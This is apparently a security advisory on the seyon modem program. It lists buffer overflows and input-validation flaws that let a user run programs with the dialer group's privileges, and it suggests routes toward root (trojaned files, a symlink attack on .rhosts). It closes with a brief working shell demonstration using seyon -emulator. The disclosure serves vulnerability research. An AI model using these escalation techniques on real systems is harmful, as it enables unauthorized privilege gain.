Vuln #1 The Seyon Mess To summarize: Seyon was supposedly not meant to run with additional privileges. There are numerous problems with seyon and I've probably not found all of them. They are: Buffer Overflows: 1. $HOME 2. seyon -emulator $BUF 3. seyon -modems $BUF 4. many long text box input string overflows while in program Input Validation: 1. seyon will search $PATH for "xterm" and "seyon-emu" and exec with fullprivs (as noted in previous advisory) 2. seyon -emulator /program/to/execute/with/full/privs These privileges might be upgradable to root if you are able to a. trojan a dialer-writable file or b. use a symlink attack to clobber .rhosts or similar c. snoop device i/o. One of the methods to exploit seyon is shown below: bash-2.03$ echo 'void main() { system("/usr/bin/id"); }' > id.c bash-2.03$ gcc -o id id.c bash-2.03$ seyon -emulator ./id uid=1000(xnec) gid=1000(xnec) egid=68(dialer) groups=68(dialer), 1000(xnec)